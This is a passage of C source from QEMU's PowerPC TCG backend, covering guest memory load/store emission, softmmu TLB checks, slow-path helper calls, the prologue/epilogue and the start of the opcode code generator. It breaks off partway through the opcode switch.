    [MO_UB] = STBX,
    [MO_UW] = STHX,
    [MO_UL] = STWX,
    [MO_Q]  = STDX,
    [MO_BSWAP | MO_UB] = STBX,
    [MO_BSWAP | MO_UW] = STHBRX,
    [MO_BSWAP | MO_UL] = STWBRX,
    [MO_BSWAP | MO_Q]  = STDBRX,
};

/* Sign-extension opcodes indexed by MO_SIZE (no 64->64 extend needed).  */
static const uint32_t qemu_exts_opc[4] = {
    EXTSB, EXTSH, EXTSW, 0
};

#if defined (CONFIG_SOFTMMU)
/* helper signature: helper_ld_mmu(CPUState *env, target_ulong addr,
 *                                 int mmu_idx, uintptr_t ra)
 */
static void * const qemu_ld_helpers[16] = {
    [MO_UB]   = helper_ret_ldub_mmu,
    [MO_LEUW] = helper_le_lduw_mmu,
    [MO_LEUL] = helper_le_ldul_mmu,
    [MO_LEQ]  = helper_le_ldq_mmu,
    [MO_BEUW] = helper_be_lduw_mmu,
    [MO_BEUL] = helper_be_ldul_mmu,
    [MO_BEQ]  = helper_be_ldq_mmu,
};

/* helper signature: helper_st_mmu(CPUState *env, target_ulong addr,
 *                                 uintxx_t val, int mmu_idx, uintptr_t ra)
 */
static void * const qemu_st_helpers[16] = {
    [MO_UB]   = helper_ret_stb_mmu,
    [MO_LEUW] = helper_le_stw_mmu,
    [MO_LEUL] = helper_le_stl_mmu,
    [MO_LEQ]  = helper_le_stq_mmu,
    [MO_BEUW] = helper_be_stw_mmu,
    [MO_BEUL] = helper_be_stl_mmu,
    [MO_BEQ]  = helper_be_stq_mmu,
};

/* Perform the TLB load and compare.  Places the result of the comparison
   in CR7, loads the addend of the TLB into R3, and returns the register
   containing the guest address (zero-extended into R4).  Clobbers R0 and R2.
*/

static TCGReg tcg_out_tlb_read(TCGContext *s, TCGMemOp s_bits,
                               TCGReg addrlo, TCGReg addrhi,
                               int mem_index, bool is_read)
{
    int cmp_off
        = (is_read
           ? offsetof(CPUArchState, tlb_table[mem_index][0].addr_read)
           : offsetof(CPUArchState, tlb_table[mem_index][0].addr_write));
    int add_off = offsetof(CPUArchState, tlb_table[mem_index][0].addend);
    TCGReg base = TCG_AREG0;

    /* Extract the page index, shifted into place for tlb index.  */
    if (TCG_TARGET_REG_BITS == 64) {
        if (TARGET_LONG_BITS == 32) {
            /* Zero-extend the address into a place helpful for further use. */
            tcg_out_ext32u(s, TCG_REG_R4, addrlo);
            addrlo = TCG_REG_R4;
        } else {
            tcg_out_rld(s, RLDICL, TCG_REG_R3, addrlo,
                        64 - TARGET_PAGE_BITS, 64 - CPU_TLB_BITS);
        }
    }

    /* Compensate for very large offsets.  */
    if (add_off >= 0x8000) {
        /* Most target env are smaller than 32k; none are larger than 64k.
           Simplify the logic here merely to offset by 0x7ff0, giving us a
           range just shy of 64k.  Check this assumption.  */
        QEMU_BUILD_BUG_ON(offsetof(CPUArchState,
                                   tlb_table[NB_MMU_MODES - 1][1])
                          > 0x7ff0 + 0x7fff);
        tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, base, 0x7ff0));
        base = TCG_REG_TMP1;
        cmp_off -= 0x7ff0;
        add_off -= 0x7ff0;
    }

    /* Extraction and shifting, part 2.  */
    if (TCG_TARGET_REG_BITS == 32 || TARGET_LONG_BITS == 32) {
        tcg_out_rlw(s, RLWINM, TCG_REG_R3, addrlo,
                    32 - (TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS),
                    32 - (CPU_TLB_BITS + CPU_TLB_ENTRY_BITS),
                    31 - CPU_TLB_ENTRY_BITS);
    } else {
        tcg_out_shli64(s, TCG_REG_R3, TCG_REG_R3, CPU_TLB_ENTRY_BITS);
    }

    /* R3 = &env->tlb_table[mem_index][index].  */
    tcg_out32(s, ADD | TAB(TCG_REG_R3, TCG_REG_R3, base));

    /* Load the tlb comparator.  */
    if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) {
        /* 64-bit guest on 32-bit host: comparator is two words.  */
        tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_R4, TCG_REG_R3, cmp_off);
        tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_TMP1, TCG_REG_R3, cmp_off + 4);
    } else {
        tcg_out_ld(s, TCG_TYPE_TL, TCG_REG_TMP1, TCG_REG_R3, cmp_off);
    }

    /* Load the TLB addend for use on the fast path.  Do this asap
       to minimize any load use delay.  */
    tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R3, TCG_REG_R3, add_off);

    /* Clear the non-page, non-alignment bits from the address.  */
    if (TCG_TARGET_REG_BITS == 32 || TARGET_LONG_BITS == 32) {
        tcg_out_rlw(s, RLWINM, TCG_REG_R0, addrlo, 0,
                    (32 - s_bits) & 31, 31 - TARGET_PAGE_BITS);
    } else if (!s_bits) {
        tcg_out_rld(s, RLDICR, TCG_REG_R0, addrlo,
                    0, 63 - TARGET_PAGE_BITS);
    } else {
        /* Rotate the alignment bits off the bottom, then back on — any
           set alignment bit forces a comparator mismatch (slow path).  */
        tcg_out_rld(s, RLDICL, TCG_REG_R0, addrlo,
                    64 - TARGET_PAGE_BITS, TARGET_PAGE_BITS - s_bits);
        tcg_out_rld(s, RLDICL, TCG_REG_R0, TCG_REG_R0, TARGET_PAGE_BITS, 0);
    }

    if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) {
        /* Compare both halves; AND the EQ bits into CR7[EQ].  */
        tcg_out_cmp(s, TCG_COND_EQ, TCG_REG_R0, TCG_REG_TMP1,
                    0, 7, TCG_TYPE_I32);
        tcg_out_cmp(s, TCG_COND_EQ, addrhi, TCG_REG_R4, 0, 6, TCG_TYPE_I32);
        tcg_out32(s, CRAND | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, CR_EQ));
    } else {
        tcg_out_cmp(s, TCG_COND_EQ, TCG_REG_R0, TCG_REG_TMP1,
                    0, 7, TCG_TYPE_TL);
    }

    return addrlo;
}

/* Record the context of a call to the out of line helper code for the slow
   path for a load or store, so that we can later generate the correct
   helper code.  */
static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc,
                                TCGReg datalo_reg, TCGReg datahi_reg,
                                TCGReg addrlo_reg, TCGReg addrhi_reg,
                                int mem_index, tcg_insn_unit *raddr,
                                tcg_insn_unit *lptr)
{
    TCGLabelQemuLdst *label = new_ldst_label(s);

    label->is_ld = is_ld;
    label->opc = opc;
    label->datalo_reg = datalo_reg;
    label->datahi_reg = datahi_reg;
    label->addrlo_reg = addrlo_reg;
    label->addrhi_reg = addrhi_reg;
    label->mem_index = mem_index;
    label->raddr = raddr;
    label->label_ptr[0] = lptr;
}

/* Slow-path load: patch the branch, marshal (env, addr, mmu_idx, retaddr)
   into the argument registers, call the helper, move the result back.  */
static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb)
{
    TCGMemOp opc = lb->opc;
    TCGReg hi, lo, arg = TCG_REG_R3;

    /* Resolve the forward branch emitted on the fast path.  */
    reloc_pc14(lb->label_ptr[0], s->code_ptr);

    tcg_out_mov(s, TCG_TYPE_PTR, arg++, TCG_AREG0);

    lo = lb->addrlo_reg;
    hi = lb->addrhi_reg;
    if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) {
#ifdef TCG_TARGET_CALL_ALIGN_ARGS
        /* 64-bit argument pairs start on an even register.  */
        arg |= 1;
#endif
        tcg_out_mov(s, TCG_TYPE_I32, arg++, hi);
        tcg_out_mov(s, TCG_TYPE_I32, arg++, lo);
    } else {
        /* If the address needed to be zero-extended, we'll have already
           placed it in R4.  The only remaining case is 64-bit guest.  */
        tcg_out_mov(s, TCG_TYPE_TL, arg++, lo);
    }

    tcg_out_movi(s, TCG_TYPE_I32, arg++, lb->mem_index);
    /* Pass the return address (still in LR) as the final argument.  */
    tcg_out32(s, MFSPR | RT(arg) | LR);

    tcg_out_call(s, qemu_ld_helpers[opc & ~MO_SIGN]);

    lo = lb->datalo_reg;
    hi = lb->datahi_reg;
    if (TCG_TARGET_REG_BITS == 32 && (opc & MO_SIZE) == MO_64) {
        tcg_out_mov(s, TCG_TYPE_I32, lo, TCG_REG_R4);
        tcg_out_mov(s, TCG_TYPE_I32, hi, TCG_REG_R3);
    } else if (opc & MO_SIGN) {
        uint32_t insn = qemu_exts_opc[opc & MO_SIZE];
        tcg_out32(s, insn | RA(lo) | RS(TCG_REG_R3));
    } else {
        tcg_out_mov(s, TCG_TYPE_REG, lo, TCG_REG_R3);
    }

    tcg_out_b(s, 0, lb->raddr);
}

/* Slow-path store: as above, plus marshalling the data value (and its
   required zero-extension for sub-word sizes).  (Continues below.)  */
static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb)
{
    TCGMemOp opc = lb->opc;
    TCGMemOp s_bits = opc & MO_SIZE;
    TCGReg hi, lo, arg = TCG_REG_R3;

    reloc_pc14(lb->label_ptr[0], s->code_ptr);

    tcg_out_mov(s, TCG_TYPE_PTR, arg++, TCG_AREG0);

    lo = lb->addrlo_reg;
    hi = lb->addrhi_reg;
    if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) {
#ifdef TCG_TARGET_CALL_ALIGN_ARGS
        arg |= 1;
#endif
        tcg_out_mov(s, TCG_TYPE_I32, arg++, hi);
        tcg_out_mov(s, TCG_TYPE_I32, arg++, lo);
    } else {
        /* If the address needed to be zero-extended, we'll have already
           placed it in R4.  The only remaining case is 64-bit guest.
*/
        tcg_out_mov(s, TCG_TYPE_TL, arg++, lo);
    }

    lo = lb->datalo_reg;
    hi = lb->datahi_reg;
    if (TCG_TARGET_REG_BITS == 32) {
        switch (s_bits) {
        case MO_64:
#ifdef TCG_TARGET_CALL_ALIGN_ARGS
            arg |= 1;
#endif
            tcg_out_mov(s, TCG_TYPE_I32, arg++, hi);
            /* FALLTHRU */
        case MO_32:
            tcg_out_mov(s, TCG_TYPE_I32, arg++, lo);
            break;
        default:
            /* Zero-extend sub-word data into the argument register.  */
            tcg_out_rlw(s, RLWINM, arg++, lo, 0, 32 - (8 << s_bits), 31);
            break;
        }
    } else {
        if (s_bits == MO_64) {
            tcg_out_mov(s, TCG_TYPE_I64, arg++, lo);
        } else {
            tcg_out_rld(s, RLDICL, arg++, lo, 0, 64 - (8 << s_bits));
        }
    }

    tcg_out_movi(s, TCG_TYPE_I32, arg++, lb->mem_index);
    /* Pass the return address (still in LR) as the final argument.  */
    tcg_out32(s, MFSPR | RT(arg) | LR);

    tcg_out_call(s, qemu_st_helpers[opc]);

    tcg_out_b(s, 0, lb->raddr);
}
#endif /* SOFTMMU */

/* Emit the fast path of a guest load: TLB check (softmmu) or guest-base
   offset (user mode), the load itself, then register the slow path.  */
static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64)
{
    TCGReg datalo, datahi, addrlo, rbase;
    TCGReg addrhi QEMU_UNUSED_VAR;
    TCGMemOp opc, s_bits;
#ifdef CONFIG_SOFTMMU
    int mem_index;
    tcg_insn_unit *label_ptr;
#endif

    datalo = *args++;
    datahi = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0);
    addrlo = *args++;
    addrhi = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0);
    opc = *args++;
    s_bits = opc & MO_SIZE;

#ifdef CONFIG_SOFTMMU
    mem_index = *args;
    addrlo = tcg_out_tlb_read(s, s_bits, addrlo, addrhi, mem_index, true);

    /* Load a pointer into the current opcode w/conditional branch-link. */
    label_ptr = s->code_ptr;
    tcg_out_bc_noaddr(s, BC | BI(7, CR_EQ) | BO_COND_FALSE | LK);

    rbase = TCG_REG_R3;
#else  /* !CONFIG_SOFTMMU */
    rbase = GUEST_BASE ? TCG_GUEST_BASE_REG : 0;
    if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) {
        tcg_out_ext32u(s, TCG_REG_TMP1, addrlo);
        addrlo = TCG_REG_TMP1;
    }
#endif

    if (TCG_TARGET_REG_BITS == 32 && s_bits == MO_64) {
        /* 64-bit data on a 32-bit host: two 32-bit loads, ordered so the
           address register is not clobbered before its second use.  */
        if (opc & MO_BSWAP) {
            tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4));
            tcg_out32(s, LWBRX | TAB(datalo, rbase, addrlo));
            tcg_out32(s, LWBRX | TAB(datahi, rbase, TCG_REG_R0));
        } else if (rbase != 0) {
            tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4));
            tcg_out32(s, LWZX | TAB(datahi, rbase, addrlo));
            tcg_out32(s, LWZX | TAB(datalo, rbase, TCG_REG_R0));
        } else if (addrlo == datahi) {
            tcg_out32(s, LWZ | TAI(datalo, addrlo, 4));
            tcg_out32(s, LWZ | TAI(datahi, addrlo, 0));
        } else {
            tcg_out32(s, LWZ | TAI(datahi, addrlo, 0));
            tcg_out32(s, LWZ | TAI(datalo, addrlo, 4));
        }
    } else {
        uint32_t insn = qemu_ldx_opc[opc];
        if (!HAVE_ISA_2_06 && insn == LDBRX) {
            /* No ldbrx before ISA 2.06: compose from two lwbrx.  */
            tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4));
            tcg_out32(s, LWBRX | TAB(datalo, rbase, addrlo));
            tcg_out32(s, LWBRX | TAB(TCG_REG_R0, rbase, TCG_REG_R0));
            tcg_out_rld(s, RLDIMI, datalo, TCG_REG_R0, 32, 0);
        } else if (insn) {
            tcg_out32(s, insn | TAB(datalo, rbase, addrlo));
        } else {
            /* No signed+byteswap insn: load unsigned then sign-extend.  */
            insn = qemu_ldx_opc[opc & (MO_SIZE | MO_BSWAP)];
            tcg_out32(s, insn | TAB(datalo, rbase, addrlo));
            insn = qemu_exts_opc[s_bits];
            tcg_out32(s, insn | RA(datalo) | RS(datalo));
        }
    }

#ifdef CONFIG_SOFTMMU
    add_qemu_ldst_label(s, true, opc, datalo, datahi, addrlo, addrhi,
                        mem_index, s->code_ptr, label_ptr);
#endif
}

/* Emit the fast path of a guest store; mirror of tcg_out_qemu_ld.  */
static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64)
{
    TCGReg datalo, datahi, addrlo, rbase;
    TCGReg addrhi QEMU_UNUSED_VAR;
    TCGMemOp opc, s_bits;
#ifdef CONFIG_SOFTMMU
    int mem_index;
    tcg_insn_unit *label_ptr;
#endif

    datalo = *args++;
    datahi = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0);
    addrlo = *args++;
    addrhi = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0);
    opc = *args++;
    s_bits = opc & MO_SIZE;

#ifdef CONFIG_SOFTMMU
    mem_index = *args;
    addrlo = tcg_out_tlb_read(s, s_bits, addrlo, addrhi, mem_index, false);

    /* Load a pointer into the current opcode w/conditional branch-link. */
    label_ptr = s->code_ptr;
    tcg_out_bc_noaddr(s, BC | BI(7, CR_EQ) | BO_COND_FALSE | LK);

    rbase = TCG_REG_R3;
#else  /* !CONFIG_SOFTMMU */
    rbase = GUEST_BASE ? TCG_GUEST_BASE_REG : 0;
    if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) {
        tcg_out_ext32u(s, TCG_REG_TMP1, addrlo);
        addrlo = TCG_REG_TMP1;
    }
#endif

    if (TCG_TARGET_REG_BITS == 32 && s_bits == MO_64) {
        if (opc & MO_BSWAP) {
            tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4));
            tcg_out32(s, STWBRX | SAB(datalo, rbase, addrlo));
            tcg_out32(s, STWBRX | SAB(datahi, rbase, TCG_REG_R0));
        } else if (rbase != 0) {
            tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4));
            tcg_out32(s, STWX | SAB(datahi, rbase, addrlo));
            tcg_out32(s, STWX | SAB(datalo, rbase, TCG_REG_R0));
        } else {
            tcg_out32(s, STW | TAI(datahi, addrlo, 0));
            tcg_out32(s, STW | TAI(datalo, addrlo, 4));
        }
    } else {
        uint32_t insn = qemu_stx_opc[opc];
        if (!HAVE_ISA_2_06 && insn == STDBRX) {
            /* No stdbrx before ISA 2.06: two stwbrx of the halves.  */
            tcg_out32(s, STWBRX | SAB(datalo, rbase, addrlo));
            tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, addrlo, 4));
            tcg_out_shri64(s, TCG_REG_R0, datalo, 32);
            tcg_out32(s, STWBRX | SAB(TCG_REG_R0, rbase, TCG_REG_TMP1));
        } else {
            tcg_out32(s, insn | SAB(datalo, rbase, addrlo));
        }
    }

#ifdef CONFIG_SOFTMMU
    add_qemu_ldst_label(s, false, opc, datalo, datahi, addrlo, addrhi,
                        mem_index, s->code_ptr, label_ptr);
#endif
}

/* Parameters for function call generation, used in tcg.c.
*/
#define TCG_TARGET_STACK_ALIGN 16
#define TCG_TARGET_EXTEND_ARGS 1

/* Per-ABI stack frame layout: size of the caller's link/parameter save
   area and the offset at which LR must be stored.  */
#ifdef _CALL_AIX
# define LINK_AREA_SIZE                (6 * SZR)
# define LR_OFFSET                     (1 * SZR)
# define TCG_TARGET_CALL_STACK_OFFSET  (LINK_AREA_SIZE + 8 * SZR)
#elif defined(TCG_TARGET_CALL_DARWIN)
# define LINK_AREA_SIZE                (6 * SZR)
# define LR_OFFSET                     (2 * SZR)
#elif TCG_TARGET_REG_BITS == 64
# if defined(_CALL_ELF) && _CALL_ELF == 2
#  define LINK_AREA_SIZE               (4 * SZR)
#  define LR_OFFSET                    (1 * SZR)
# endif
#else /* TCG_TARGET_REG_BITS == 32 */
# if defined(_CALL_SYSV)
#  define LINK_AREA_SIZE               (2 * SZR)
#  define LR_OFFSET                    (1 * SZR)
# endif
#endif
#ifndef LR_OFFSET
# error "Unhandled abi"
#endif
#ifndef TCG_TARGET_CALL_STACK_OFFSET
# define TCG_TARGET_CALL_STACK_OFFSET  LINK_AREA_SIZE
#endif

#define CPU_TEMP_BUF_SIZE  (CPU_TEMP_BUF_NLONGS * (int)sizeof(long))
#define REG_SAVE_SIZE      ((int)ARRAY_SIZE(tcg_target_callee_save_regs) * SZR)

#define FRAME_SIZE ((TCG_TARGET_CALL_STACK_OFFSET   \
                     + TCG_STATIC_CALL_ARGS_SIZE    \
                     + CPU_TEMP_BUF_SIZE            \
                     + REG_SAVE_SIZE                \
                     + TCG_TARGET_STACK_ALIGN - 1)  \
                    & -TCG_TARGET_STACK_ALIGN)

#define REG_SAVE_BOT (FRAME_SIZE - REG_SAVE_SIZE)

/* Emit the one-time prologue/epilogue pair that enters and leaves
   generated code: set up the frame, save callee-saved registers and LR,
   dispatch through CTR, and (if used) establish the RA register.  */
static void tcg_target_qemu_prologue(TCGContext *s)
{
    int i;

#ifdef _CALL_AIX
    /* AIX entry points are function descriptors, not code addresses.  */
    void **desc = (void **)s->code_ptr;
    desc[0] = desc + 2;                   /* entry point */
    desc[1] = 0;                          /* environment pointer */
    s->code_ptr = (void *)(desc + 2);     /* skip over descriptor */
#endif

    tcg_set_frame(s, TCG_REG_CALL_STACK, REG_SAVE_BOT - CPU_TEMP_BUF_SIZE,
                  CPU_TEMP_BUF_SIZE);

    /* Prologue */
    tcg_out32(s, MFSPR | RT(TCG_REG_R0) | LR);
    tcg_out32(s, (SZR == 8 ? STDU : STWU)
              | SAI(TCG_REG_R1, TCG_REG_R1, -FRAME_SIZE));

    for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i) {
        tcg_out_st(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i],
                   TCG_REG_R1, REG_SAVE_BOT + i * SZR);
    }
    tcg_out_st(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_R1, FRAME_SIZE+LR_OFFSET);

#ifdef CONFIG_USE_GUEST_BASE
    if (GUEST_BASE) {
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, GUEST_BASE);
        tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG);
    }
#endif

    tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]);
    tcg_out32(s, MTSPR | RS(tcg_target_call_iarg_regs[1]) | CTR);

    if (USE_REG_RA) {
#ifdef _CALL_AIX
        /* Make the caller load the value as the TOC into R2.  */
        tb_ret_addr = s->code_ptr + 2;
        desc[1] = tb_ret_addr;
        tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_RA, TCG_REG_R2);
        tcg_out32(s, BCCTR | BO_ALWAYS);
#elif defined(_CALL_ELF) && _CALL_ELF == 2
        /* Compute from the incoming R12 value.  */
        tb_ret_addr = s->code_ptr + 2;
        tcg_out32(s, ADDI | TAI(TCG_REG_RA, TCG_REG_R12,
                                tcg_ptr_byte_diff(tb_ret_addr, s->code_buf)));
        tcg_out32(s, BCCTR | BO_ALWAYS);
#else
        /* Reserve max 5 insns for the constant load.  */
        tb_ret_addr = s->code_ptr + 6;
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_RA, (intptr_t)tb_ret_addr);
        tcg_out32(s, BCCTR | BO_ALWAYS);
        while (s->code_ptr < tb_ret_addr) {
            tcg_out32(s, NOP);
        }
#endif
    } else {
        tcg_out32(s, BCCTR | BO_ALWAYS);
        tb_ret_addr = s->code_ptr;
    }

    /* Epilogue */
    assert(tb_ret_addr == s->code_ptr);

    tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_R1, FRAME_SIZE+LR_OFFSET);
    for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i) {
        tcg_out_ld(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i],
                   TCG_REG_R1, REG_SAVE_BOT + i * SZR);
    }
    tcg_out32(s, MTSPR | RS(TCG_REG_R0) | LR);
    tcg_out32(s, ADDI | TAI(TCG_REG_R1, TCG_REG_R1, FRAME_SIZE));
    tcg_out32(s, BCLR | BO_ALWAYS);
}

/* Main per-opcode code generator.  NOTE(review): this function continues
   beyond the visible chunk — only its head is carried here.  */
static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args,
                       const int *const_args)
{
    TCGArg a0, a1, a2;
    int c;

    switch (opc) {
    case INDEX_op_exit_tb:
        if (USE_REG_RA) {
            ptrdiff_t disp = tcg_pcrel_diff(s, tb_ret_addr);

            /* If we can use a direct branch, otherwise use the value in RA.
               Note that the direct branch is always forward.  If it's in
               range now, it'll still be in range after the movi.  Don't
               bother about the 20 bytes where the test here fails but it
               would succeed below.  */
            if (!in_range_b(disp)) {
                tcg_out32(s, MTSPR | RS(TCG_REG_RA) | CTR);
                tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R3, args[0]);
                tcg_out32(s, BCCTR | BO_ALWAYS);
                break;
            }
        }
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R3, args[0]);
        tcg_out_b(s, 0, tb_ret_addr);
        break;
    case INDEX_op_goto_tb:
        if (s->tb_jmp_offset) {
            /* Direct jump method.  */
            s->tb_jmp_offset[args[0]] = tcg_current_code_size(s);
            s->code_ptr += 7;
        } else {
            /* Indirect jump method.
*/ + tcg_abort(); + } + s->tb_next_offset[args[0]] = tcg_current_code_size(s); + break; + case INDEX_op_br: + { + TCGLabel *l = &s->labels[args[0]]; + + if (l->has_value) { + tcg_out_b(s, 0, l->u.value_ptr); + } else { + tcg_out_reloc(s, s->code_ptr, R_PPC_REL24, args[0], 0); + tcg_out_b_noaddr(s, B); + } + } + break; + case INDEX_op_ld8u_i32: + case INDEX_op_ld8u_i64: + tcg_out_mem_long(s, LBZ, LBZX, args[0], args[1], args[2]); + break; + case INDEX_op_ld8s_i32: + case INDEX_op_ld8s_i64: + tcg_out_mem_long(s, LBZ, LBZX, args[0], args[1], args[2]); + tcg_out32(s, EXTSB | RS(args[0]) | RA(args[0])); + break; + case INDEX_op_ld16u_i32: + case INDEX_op_ld16u_i64: + tcg_out_mem_long(s, LHZ, LHZX, args[0], args[1], args[2]); + break; + case INDEX_op_ld16s_i32: + case INDEX_op_ld16s_i64: + tcg_out_mem_long(s, LHA, LHAX, args[0], args[1], args[2]); + break; + case INDEX_op_ld_i32: + case INDEX_op_ld32u_i64: + tcg_out_mem_long(s, LWZ, LWZX, args[0], args[1], args[2]); + break; + case INDEX_op_ld32s_i64: + tcg_out_mem_long(s, LWA, LWAX, args[0], args[1], args[2]); + break; + case INDEX_op_ld_i64: + tcg_out_mem_long(s, LD, LDX, args[0], args[1], args[2]); + break; + case INDEX_op_st8_i32: + case INDEX_op_st8_i64: + tcg_out_mem_long(s, STB, STBX, args[0], args[1], args[2]); + break; + case INDEX_op_st16_i32: + case INDEX_op_st16_i64: + tcg_out_mem_long(s, STH, STHX, args[0], args[1], args[2]); + break; + case INDEX_op_st_i32: + case INDEX_op_st32_i64: + tcg_out_mem_long(s, STW, STWX, args[0], args[1], args[2]); + break; + case INDEX_op_st_i64: + tcg_out_mem_long(s, STD, STDX, args[0], args[1], args[2]); + break; + + case INDEX_op_add_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + do_addi_32: + tcg_out_mem_long(s, ADDI, ADD, a0, a1, (int32_t)a2); + } else { + tcg_out32(s, ADD | TAB(a0, a1, a2)); + } + break; + case INDEX_op_sub_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[1]) { + if (const_args[2]) { + tcg_out_movi(s, 
TCG_TYPE_I32, a0, a1 - a2); + } else { + tcg_out32(s, SUBFIC | TAI(a0, a2, a1)); + } + } else if (const_args[2]) { + a2 = -a2; + goto do_addi_32; + } else { + tcg_out32(s, SUBF | TAB(a0, a2, a1)); + } + break; + + case INDEX_op_and_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_andi32(s, a0, a1, a2); + } else { + tcg_out32(s, AND | SAB(a1, a0, a2)); + } + break; + case INDEX_op_and_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_andi64(s, a0, a1, a2); + } else { + tcg_out32(s, AND | SAB(a1, a0, a2)); + } + break; + case INDEX_op_or_i64: + case INDEX_op_or_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_ori32(s, a0, a1, a2); + } else { + tcg_out32(s, OR | SAB(a1, a0, a2)); + } + break; + case INDEX_op_xor_i64: + case INDEX_op_xor_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_xori32(s, a0, a1, a2); + } else { + tcg_out32(s, XOR | SAB(a1, a0, a2)); + } + break; + case INDEX_op_andc_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_andi32(s, a0, a1, ~a2); + } else { + tcg_out32(s, ANDC | SAB(a1, a0, a2)); + } + break; + case INDEX_op_andc_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_andi64(s, a0, a1, ~a2); + } else { + tcg_out32(s, ANDC | SAB(a1, a0, a2)); + } + break; + case INDEX_op_orc_i32: + if (const_args[2]) { + tcg_out_ori32(s, args[0], args[1], ~args[2]); + break; + } + /* FALLTHRU */ + case INDEX_op_orc_i64: + tcg_out32(s, ORC | SAB(args[1], args[0], args[2])); + break; + case INDEX_op_eqv_i32: + if (const_args[2]) { + tcg_out_xori32(s, args[0], args[1], ~args[2]); + break; + } + /* FALLTHRU */ + case INDEX_op_eqv_i64: + tcg_out32(s, EQV | SAB(args[1], args[0], args[2])); + break; + case INDEX_op_nand_i32: + case INDEX_op_nand_i64: + tcg_out32(s, NAND | SAB(args[1], args[0], args[2])); + break; + case INDEX_op_nor_i32: + case INDEX_op_nor_i64: + 
tcg_out32(s, NOR | SAB(args[1], args[0], args[2])); + break; + + case INDEX_op_mul_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out32(s, MULLI | TAI(a0, a1, a2)); + } else { + tcg_out32(s, MULLW | TAB(a0, a1, a2)); + } + break; + + case INDEX_op_div_i32: + tcg_out32(s, DIVW | TAB(args[0], args[1], args[2])); + break; + + case INDEX_op_divu_i32: + tcg_out32(s, DIVWU | TAB(args[0], args[1], args[2])); + break; + + case INDEX_op_shl_i32: + if (const_args[2]) { + tcg_out_shli32(s, args[0], args[1], args[2]); + } else { + tcg_out32(s, SLW | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_shr_i32: + if (const_args[2]) { + tcg_out_shri32(s, args[0], args[1], args[2]); + } else { + tcg_out32(s, SRW | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_sar_i32: + if (const_args[2]) { + tcg_out32(s, SRAWI | RS(args[1]) | RA(args[0]) | SH(args[2])); + } else { + tcg_out32(s, SRAW | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_rotl_i32: + if (const_args[2]) { + tcg_out_rlw(s, RLWINM, args[0], args[1], args[2], 0, 31); + } else { + tcg_out32(s, RLWNM | SAB(args[1], args[0], args[2]) + | MB(0) | ME(31)); + } + break; + case INDEX_op_rotr_i32: + if (const_args[2]) { + tcg_out_rlw(s, RLWINM, args[0], args[1], 32 - args[2], 0, 31); + } else { + tcg_out32(s, SUBFIC | TAI(TCG_REG_R0, args[2], 32)); + tcg_out32(s, RLWNM | SAB(args[1], args[0], TCG_REG_R0) + | MB(0) | ME(31)); + } + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond(s, args[2], args[0], args[1], const_args[1], + args[3], TCG_TYPE_I32); + break; + case INDEX_op_brcond_i64: + tcg_out_brcond(s, args[2], args[0], args[1], const_args[1], + args[3], TCG_TYPE_I64); + break; + case INDEX_op_brcond2_i32: + tcg_out_brcond2(s, args, const_args); + break; + + case INDEX_op_neg_i32: + case INDEX_op_neg_i64: + tcg_out32(s, NEG | RT(args[0]) | RA(args[1])); + break; + + case INDEX_op_not_i32: + case 